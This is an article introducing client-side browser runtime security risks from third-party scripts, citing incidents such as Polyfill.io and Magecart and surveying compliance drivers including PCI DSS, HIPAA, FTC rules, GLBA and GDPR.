There has been a recent increase in specific types of cybersecurity breaches, data leaks, and supply chain attacks, all linked to compromises that begin during runtime on users’ internet browsers. Traditional cybersecurity solutions lack the visibility and reach to detect, protect, and respond to such incidents.
The term Web Client Runtime Security (WCRS)1 was coined by the authors to highlight the security or possible malicious behavior of the code executed in users' browsers during their web interactions. While the code is served to users via the websites they visit, not all of it is written by the websites’ owners or even hosted on the website. This complexity leads to vulnerabilities arising from the use of third-party code. It is important to note that such code is usually hosted and served dynamically at runtime from digital supply chain parties or even fourth- and fifth-party code loaded by those parties. The website owners, therefore, would have no control or means to assert the integrity of the code owned or maintained by the third party.
The 2024 Polyfill.io supply chain attack, where a trusted third-party script was replaced with a malicious one, may have affected more than 100,000 websites by some estimates.2 It is just one of the latest incidents involving exploitation at run-time in consumer web browsers. Cisco3, Everlast,4 and many other organizations5 have also had WCRS-related cybersecurity incidents in recent years. These incidents are in addition to other, earlier significant examples of Magecart-style attacks,6 which focused on skimming payment card data at prominent organizations such as British Airways, Ticketmaster, and many others.7 The WCRS-related breaches are not limited to those caused by adversarial threat issues. Breaches can also come from the unintended transfer of sensitive or regulated data to third parties. The recent incidents at Kaiser Permanente8 and the United States Department of Education9 are examples of such inadvertent breaches.
This preliminary article in a three-part series on WCRS introduces the concept to readers, emphasizes the importance of prioritizing WCRS in cybersecurity programs beyond traditional application security measures, and examines the risk and compliance drivers for implementing and operationalizing WCRS mechanisms.
The Need for Special Attention to WCRS
Web application security is not a new discipline. The Open Worldwide Application Security Project (OWASP) Top 10,10 the premier web application security awareness project for more than 20 years, demonstrates that organizations paid attention to web application security long before many of the modern web application threats were known or anticipated.
However, historically the security industry has focused primarily on the server side of web applications rather than the client (browser) side at runtime. The nascent nature of WCRS is also evidenced by the fact that OWASP's work11 on this topic appears to have only started in 202212 and remains an incubator project.
Traditional client-side vulnerabilities, such as cross-site scripting (XSS) and cross-site request forgery (CSRF), were often mitigated with server-side code changes that are either implemented by or at the behest of the hosting organization. It is only in recent years that client-side runtime security has started gaining prominence. This is primarily because internet browsers have become progressively function-rich in recent years, requiring organizational websites to rely increasingly on downstream (e.g., third or nth parties) sources for significant amounts of code that must be loaded dynamically from those sources at runtime.
It would also not be technically or operationally feasible for website owners to use traditional application security tests such as static application security testing (SAST)13 or dynamic application security testing (DAST)14 to ensure that the code provided by third parties or subsequent parties further downstream (nth parties) is not malicious. Further discussion in this series (part 2) delves into the details of why these and other traditional web applications security application tools or approaches are ineffective when mitigating WCRS risk.
Historically the security industry has focused primarily on the server side of web applications rather than the client (browser) side at runtime.
Organizations must, therefore, rely on a newer set of WCRS approaches or technology solutions to monitor the behavior of all code served by their websites and executed by the browser at run-time (i.e. during users’ interactions with websites).
Risk and Compliance Drivers
WCRS must be a focus for any website that processes sensitive information or any information that might be of value to adversaries. As such, WCRS should be top of mind for most industries when protecting themselves against reputational or financial risk in the event of a data breach.
WCRS is also relevant in the context of various security or privacy laws and regulations.
PCI DSS
Perhaps the earliest and most notable WCRS compromises, the Magecart-style attacks, were designed to skim payment card data on ecommerce websites. Given the frequency and severity of these attacks, it is no surprise that the Payment Card Industry (PCI) is the first to issue specific mandates focused on WCRS.
Figure 1 outlines the PCI Data Security Standard (DSS) v4, which mandates two specific requirements that become mandatory on 31 March 2025.
Figure 1—PCI DDS v4 Requirements 6.4.3 and 11.6.115
The PCI DSS Sub-requirements appearing above have been extracted from the Payment Card Industry (PCI) Data Security Standard, v4.0.1 and appear courtesy of PCI Security Standards Council, LLC. © 2006-2024 PCI Security Standards Council, LLC. All Rights Reserved.
HIPAA Security and Privacy Rules
The US Health Insurance Portability and Accountability Act (HIPAA) regulates several aspects of the healthcare industry. While the HIPAA Security, Privacy, and Breach Notification Rules do not contain prescriptive WCRS requirements, the US Department of Health and Human Services’ Office of Civil Rights (OCR) has drawn attention to the WCRS issue through guidance bulletins.
The guidance bulletin issued on 26 June 2024 highlights “the obligations of [HIPAA Regulated Entities] under the [HIPAA Rules] when using online tracking technologies.”16 In the bulletin, the OCR stresses that “Regulated entities are not permitted to use tracking technologies in a manner that would result in impermissible disclosures of protected health information (PHI) to tracking technology vendors or any other violations of the HIPAA Rules. While it has always been true that regulated entities may not impermissibly disclose PHI to tracking technology vendors, because of the proliferation of tracking technologies collecting sensitive information, OCR is providing this reminder that it is critical for regulated entities to ensure that they disclose PHI only as expressly permitted or required by the HIPAA Privacy Rule.”17
The OCR bulletin underscores the increasing challenge of preventing PHI data leaks to online tracking solution providers and the critical need for regulated entities to ensure that PHI is disclosed only in strict accordance with the HIPAA Privacy Rule.
FTC Health Breach Notification Rule
The United States Federal Trade Commission (FTC) is the regulator for the Health Breach Notification Rule,18 which has been in effect since 2009 and applies to organizations that are not covered by the HIPAA Breach Notification Rule. The regulation covers vendors of personal health records (PHRs) and their third-party service providers.
The FTC also issued a recent amendment to the rule that went into effect on 29 July 2024.19 The amendment clarifies that the regulation also applies to organizations that collect user health information such as fitness trackers and wellness apps (e.g., for diet, diabetes, or blood pressure monitoring). Section I.B–Enforcement History of the amendment includes two examples—GoodRx and Easy Healthcare—of FTC enforcements from 2023 that relate to WCRS.
It should also be noted that FTC issued a joint guidance with the US OCR in 2023 regarding online tracking technologies in websites and mobile apps20, to reinforce the need for healthcare and wellness organizations to pay attention to unauthorized malicious or inadvertent disclosure of sensitive information resulting from scripts or tracking technologies (such as cookies) at runtime.
Gramm-Leach-Bliley Act
The Gramm-Leach-Bliley Act21 is a United States federal law first enacted in 1999. It mandates requirements for financial institutions regarding the protection of non-public personal information. The law is enforced by federal financial regulators, the FTC, and insurance authorities across different states in the United States. Recently the FTC enacted modifications to amend the Standards for Safeguarding Customer Information rule, which became effective on 10 January 2022.22 While regulators have not issued specific mandates concerning WCRS, the broad definition of non-public personal information would require financial institutions to implement WCRS safeguards on their customer-facing websites.
Section 5 of the FTC Act
In addition to the US FTC Breach Notification Rule and the US Gramm-Leach-Bliley Act, the FTC has enforcement power of yet another regulation that is broad in its scope and would almost certainly cover instances of breaches resulting from WCRS-related exploits. Section 5 of the FTC Act, Unfair or Deceptive Acts or Practices, applies to all persons and organizations engaged in commerce regardless of the industry.23 As can be seen in the FTC’s clarification/statement on deception,24 it is reasonable to assume that organizations enduring a WCRS-related breach will likely be found in violation of the FTC Act, considering that most organizations’ website privacy policies or statements include an assertion that they have implemented necessary security safeguards, including on their websites.
Section 5 of the FTC Act is particularly noteworthy because the FTC can enforce it over and above other enforcement initiated by other federal or state-level regulators for the same incident, resulting in increased regulatory fines. A good example is the FTC’s CVS Caremark enforcement in 2009.25 In this case, the organization, a HIPAA-regulated entity, had already undergone enforcement by the OCR for the same breach.
FFIEC IT Examination Handbook
The Federal Financial Institutions Examination Council (FFIEC) is a federal interagency body of 5 banking regulators in the United States. The FFIEC publishes and maintains an IT Handbook, which includes booklets on various topics such as information security.26 This handbook provides principles and practices for banking examiners to review.
While the Handbook does not mention WCRS specifically, the Information Security booklet27 contains the overarching requirements related to web application security. The most relevant to WCRS among them would be “Protect web or Internet-facing applications through additional controls, including web application firewalls, regular scanning for new or recurring vulnerabilities, mitigation or remediation of common security weaknesses, and network segregation to limit inappropriate access or connections to the application or other areas of the network.”28
GDPR and Similar Privacy Laws
The EU General Data Protection Regulation (GDPR)29 took effect in May 2018, establishing requirements for the processing and protection of personal data belonging to EU residents.
As it relates to WCRS, the GDPR’s Article 5(1)(f) requires that personal data shall be “processed in a manner that ensures appropriate security of the personal data, including protection against unauthorized or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organizational measures (‘integrity and confidentiality’).” 30
It is important to note that an effective WCRS implementation might have helped British Airways with the Magecart-related GDPR enforcement31 in 2020. In their penalty notice, the UK Information Commissioners Office (ICO) states “The failures are especially serious in circumstances where it is unclear whether or when BA itself would ever have detected the breach. BA was only alerted to the exfiltration of personal data from its website by a third-party.”32 Cybersecurity leaders under the purview of GDPR must act with prudence and consider implementing robust WCRS solutions to proactively detect and mitigate client-side threats.
The GDPR is not unique in requiring the implementation of appropriate safeguards, even if it does not include or prescribe WCRS safeguards. Similar regulations worldwide mandate the implementation of reasonable or appropriate safeguards.
US State-Level Regulations
In addition to the previously discussed US federal laws and regulations, most US states have their own mandates for privacy, protection of personal data, and breach notification requirements for their residents’ data. This includes newer regulations that are focused on the protection of consumer health data. Some examples include the State of Washington’s My Health My Data Act,33 the State of Connecticut’s Substitute Bill No. 3,34 and the State of Nevada’s SB370.35
Conclusion
WCRS should be a key consideration for any organization that runs websites that process sensitive or regulated data due to the demonstrable security and privacy risk discussed in this article. Beyond the risk of non-compliance that might result in severe regulatory enforcement, organizations may also need to consider the possible business risk from class-action lawsuits, and the risk to their brand or reputation.
The next part of this series will cover certain implementation options that organizations may consider for implementing effective WCRS capabilities.
Endnotes
1 This term is coined by the authors.
2 Censys Research Team, “Polyfill.io Supply Chain Attack – Digging into the Web of Compromised Domains,” Censys, 2 July 2024
3 Lyons, J.; “Cisco merch shoppers stung in Magecart attack,” MSN, 6, September 2024
4 Naprys, E.; “Everlast Hacked, Customer Credit Cards Compromised,” Cybernews, 15, November 2023
5 Montalbano, E, “WordPress Supply Chain Attack Spreads Across Multiple Plug-ins,” Dark Reading, 25 June 2024
6 Sansec Forensics Team, “What Is Magecart?,” Sansec, 8 April 2024
7 CISOMAG, “Researcher Says British Airways Hack Caused by the Same Group That Pwned Ticketmaster,” 17 September 2018
8 Kaiser Permanente, “Important Notice About a Privacy Matter,” 6 May 2024
9 Lecher, C.; “Department of Education Sued Following Markup Investigation Into FAFSA Data Shared with Facebook,” The Markup, 26 July 2024
10 Van der Stock, A.; “OWASP Top 10,” PowerPoint Presentation
11 OWASP, “OWASP Top 10 Client-Side Security Risks”
12 Google Groups, Candidate OWASP Top 10 Client-Side Security Risks
13 OWASP, “DevSecOps Guideline – v-0.2 — Static Code Analysis”
14 OWASP, “DevSecOps Guideline – v-0.2 —Dynamic Application Security Testing (DAST)”
15 Payment Card Information Security Standards Council, PCI DSS v4.0.1
16 United States Department of Health and Human Services, “Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates,” USA
17 United States Department of Health and Human Services, Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates
18 National Archives Code of Federal Regulations, Part 318—HEALTH BREACH NOTIFICATION RULE, 30 May 2024
19 National Archives Federal Register, Health Breach Notification Rule (Amendment), USA, 30 May 2024
20 Federal Trade Commission (FTC), “FTC and HHS Warn Hospital Systems and Telehealth Providers About Privacy and Security Risks from Online Tracking Technologies,” 20 July 2023
21 Gramm-Leach-Bliley Act, Pub. L. No. 106-102, 113 Stat. 1338
22 Federal Register, Standards for Safeguarding Customer Information, 9 December 2021
23 FTC, Federal Trade Commission Act Section 5: Unfair or Deceptive Acts or Practices, USA
24 FTC, “FTC Policy Statement on Deception,” 14 October 1983, USA
25 FTC, “CVS Caremark Settles FTC Charges: Failed to Protect Medical and Financial Privacy of Customers and Employees; CVS Pharmacy Also Pays $2.25 Million to Settle Allegations of HIPAA Violations,” USA, 18 February 2009
26 Federal Financial Institutions Examinations Council (FFIEC) IT Examination Infobase, “IT Booklets,” USA
27 FFIEC Information Technology, FFIEC Information Technology Examination Handbook–Information Security, September 2016, USA
28 FFIEC Information Technology, FFIEC Information Technology Examination Handbook–Information Security
29 Eur-lex.europa.eu, Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation [or GDPR]) (OJ L 119, 4.5.2016, p. 1), Article 16, European Union, 27 April 2016
30 Legislation.gov.uk, Regulation (EU) 2016/679 of the European Parliament and of the Council, United Kingdom, 27 March 2016
31 Bannister, A.; “British Airways Agrees to Pay Victims of Record-Breaking Data Breach,” The Daily Swig, 7 July 2021
32 Information Commissioner’s Office, Penalty Notice for British Airways 2018 Breach, 16 October 2020
33 Washington State Office of the Attorney General, “Protecting Washingtonians’ Personal Health Data and Privacy,” USA
34 State of Connecticut Substitute, Substitute S. 3, 2024, USA
35 Nevada Legislature, S. 370, 2023, USA
Sergei Vasilevsky, CISSP
Is the founder and president of ILIAM Consulting. Vasilevsky has over 20 years of cybersecurity consulting experience, beginning at a Big 4 for 7 years. ILIAM Consulting provides customized cybersecurity and compliance solutions related to application security architecture, vulnerability management, identity and access management, and regulatory compliance. Its work spans multiple industries, including finance, healthcare, and aviation. You can reach Sergei at http://www.linkedin.com/in/sergeivasilevsky/
Kamal Govindaswamy, CCSP, CISSP, CIPP/US
Is the co-founder and security practice leader at Tueoris. Govindaswamy has been a security consultant for over 20 years, beginning at a Big 4 for 6 years. He has served clients across not-for-profit, healthcare, retail, financial services, life sciences, insurance, and consumer business industries. You can reach Kamal at http://www.linkedin.com/in/kgswamy/
